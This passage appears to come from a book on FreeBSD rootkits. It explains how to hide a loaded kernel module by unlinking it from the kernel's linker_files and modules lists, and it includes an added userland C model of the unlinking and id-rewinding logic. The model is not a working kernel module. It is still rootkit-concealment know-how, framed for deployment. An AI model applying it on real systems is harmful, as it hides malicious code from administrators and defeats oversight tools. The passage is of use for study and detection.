Hiding a KLD
To remedy this problem, we'll employ some DKOM to hide the rootkit, which, technically, is just another KLD: if it is no longer on the kernel's own bookkeeping lists, tools such as kldstat(8) cannot report it.
Recall from Chapter 1 that whenever you load a KLD into the kernel, you are actually loading a linker file that contains one or more kernel modules. As a result, whenever a KLD is loaded, it is recorded on two different lists: linker_files and modules. As their names imply, linker_files holds the set of loaded linker files, while modules holds the set of loaded kernel modules.
As with the previous DKOM code, the KLD-hiding routine will traverse both of these lists in a safe manner (holding the lock that protects each list, and never dereferencing an entry after unlinking it) and remove the structure(s) of your choosing. Note that the entries are only unlinked, not freed: the KLD's code and data stay mapped and running, so the hidden module keeps working.
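The two-list unlinking described above, as an added userland model; this is not the book's code and not a loadable kernel module. It rebuilds linker_files and modules as TAILQ lists with cut-down versions of the kernel's struct linker_file and struct module, loads three constructed entries, and then unlinks one linker file together with every module that belongs to it. The field subset, the id counters and their rewind rule, the sample names (kld_hide.ko and friends), and the side lists that keep the unlinked pointers reachable are all assumptions of this model; the real kernel structures are larger, and the real routine must take the locks that guard each list, which the model omits.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/queue.h>

/* Cut-down stand-ins for the kernel's struct linker_file and struct module
 * (assumption: only the fields the hide logic needs are modelled). */
struct linker_file {
    int  id;                        /* what kldstat(8) shows as Id   */
    char filename[64];              /* what kldstat(8) shows as Name */
    TAILQ_ENTRY(linker_file) link;  /* linkage on linker_files       */
};
TAILQ_HEAD(linker_file_head, linker_file);

struct module {
    int  id;                        /* what modstat(8) shows as Id */
    char name[64];
    struct linker_file *file;       /* linker file this module came from */
    TAILQ_ENTRY(module) link;       /* linkage on modules */
};
TAILQ_HEAD(modulelist, module);

/* The two kernel lists, plus private side lists so a hidden entry stays
 * reachable (e.g. to re-link it before unload). No locking in this model. */
static struct linker_file_head linker_files = TAILQ_HEAD_INITIALIZER(linker_files);
static struct linker_file_head hidden_files = TAILQ_HEAD_INITIALIZER(hidden_files);
static struct modulelist modules = TAILQ_HEAD_INITIALIZER(modules);
static struct modulelist hidden_modules = TAILQ_HEAD_INITIALIZER(hidden_modules);
static int next_file_id = 1;        /* next id the loader would hand out */
static int nextid = 1;              /* same counter, for modules */

static struct linker_file *load_file(const char *filename)
{
    struct linker_file *lf = calloc(1, sizeof(*lf));
    lf->id = next_file_id++;
    strncpy(lf->filename, filename, sizeof(lf->filename) - 1);
    TAILQ_INSERT_TAIL(&linker_files, lf, link);
    return lf;
}

static void load_module(struct linker_file *lf, const char *name)
{
    struct module *mod = calloc(1, sizeof(*mod));
    mod->id = nextid++;
    strncpy(mod->name, name, sizeof(mod->name) - 1);
    mod->file = lf;
    TAILQ_INSERT_TAIL(&modules, mod, link);
}

static int file_id_in_use(int id)
{
    struct linker_file *lf;
    TAILQ_FOREACH(lf, &linker_files, link) if (lf->id == id) return 1;
    return 0;
}

static int module_id_in_use(int id)
{
    struct module *mod;
    TAILQ_FOREACH(mod, &modules, link) if (mod->id == id) return 1;
    return 0;
}

/* Unlink the named linker file and every module that points at it.
 * Returns the number of entries removed, or -1 if the file is not listed. */
int hide_kld(const char *filename)
{
    struct linker_file *lf, *target = NULL;
    struct module *mod, *next;
    int removed = 0;

    TAILQ_FOREACH(lf, &linker_files, link)
        if (strcmp(lf->filename, filename) == 0) { target = lf; break; }
    if (target == NULL)
        return -1;

    /* Modules first, saving the successor before each unlink so the
     * traversal never touches an element that is no longer on the list. */
    for (mod = TAILQ_FIRST(&modules); mod != NULL; mod = next) {
        next = TAILQ_NEXT(mod, link);
        if (mod->file == target) {
            TAILQ_REMOVE(&modules, mod, link);
            TAILQ_INSERT_TAIL(&hidden_modules, mod, link);  /* not freed */
            removed++;
        }
    }
    TAILQ_REMOVE(&linker_files, target, link);
    TAILQ_INSERT_TAIL(&hidden_files, target, link);         /* not freed */
    removed++;

    /* Give back ids at the top of the range so the next load reuses them
     * and no gap betrays the removal; ids below a live entry are kept,
     * since reusing those would collide with a visible entry. */
    while (next_file_id > 1 && !file_id_in_use(next_file_id - 1))
        next_file_id--;
    while (nextid > 1 && !module_id_in_use(nextid - 1))
        nextid--;
    return removed;
}

/* What kldstat/modstat-style walkers of the two lists would observe. */
int linker_file_count(void) { int n = 0; struct linker_file *lf; TAILQ_FOREACH(lf, &linker_files, link) n++; return n; }
int module_count(void)      { int n = 0; struct module *m;       TAILQ_FOREACH(m, &modules, link) n++;       return n; }
int linker_file_visible(const char *fn) { struct linker_file *lf; TAILQ_FOREACH(lf, &linker_files, link) if (!strcmp(lf->filename, fn)) return 1; return 0; }
int module_visible(const char *nm)      { struct module *m;       TAILQ_FOREACH(m, &modules, link)       if (!strcmp(m->name, nm))      return 1; return 0; }
int next_file_id_value(void)   { return next_file_id; }
int next_module_id_value(void) { return nextid; }

/* Constructed sample: a kernel with two modules, a NIC driver, and the
 * hypothetical rootkit kld_hide.ko carrying two modules. Resets state first. */
void build_sample_lists(void)
{
    struct linker_file *lf; struct module *m;
    while ((m = TAILQ_FIRST(&modules)) != NULL)         { TAILQ_REMOVE(&modules, m, link);         free(m); }
    while ((m = TAILQ_FIRST(&hidden_modules)) != NULL)  { TAILQ_REMOVE(&hidden_modules, m, link);  free(m); }
    while ((lf = TAILQ_FIRST(&linker_files)) != NULL)   { TAILQ_REMOVE(&linker_files, lf, link);   free(lf); }
    while ((lf = TAILQ_FIRST(&hidden_files)) != NULL)   { TAILQ_REMOVE(&hidden_files, lf, link);   free(lf); }
    next_file_id = 1; nextid = 1;
    lf = load_file("kernel");      load_module(lf, "kernel"); load_module(lf, "if_lo");
    lf = load_file("if_em.ko");    load_module(lf, "if_em");
    lf = load_file("kld_hide.ko"); load_module(lf, "kld_hide"); load_module(lf, "kld_hide_sysctl");
}

int main(void)
{
    build_sample_lists();
    printf("before: %d files, %d modules\n", linker_file_count(), module_count());
    int n = hide_kld("kld_hide.ko");
    printf("unlinked %d entries; after: %d files, %d modules; kld_hide.ko visible: %d\n",
           n, linker_file_count(), module_count(), linker_file_visible("kld_hide.ko"));
    return 0;
}
```

Two practical consequences follow from the unlink-only approach and are worth checking before deploying it: anything that resolves a KLD by walking these lists (kldunload by id, modfind by name) can no longer find the hidden entry, so the rootkit must re-link its structures itself before it can be unloaded cleanly; and the entries are still in kernel memory, so a scanner that walks the kernel's memory rather than the lists can still find them.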
The linker_files List
The linker_files list is defined in the file /sys/kern/kern_linker.c as follows:
static ...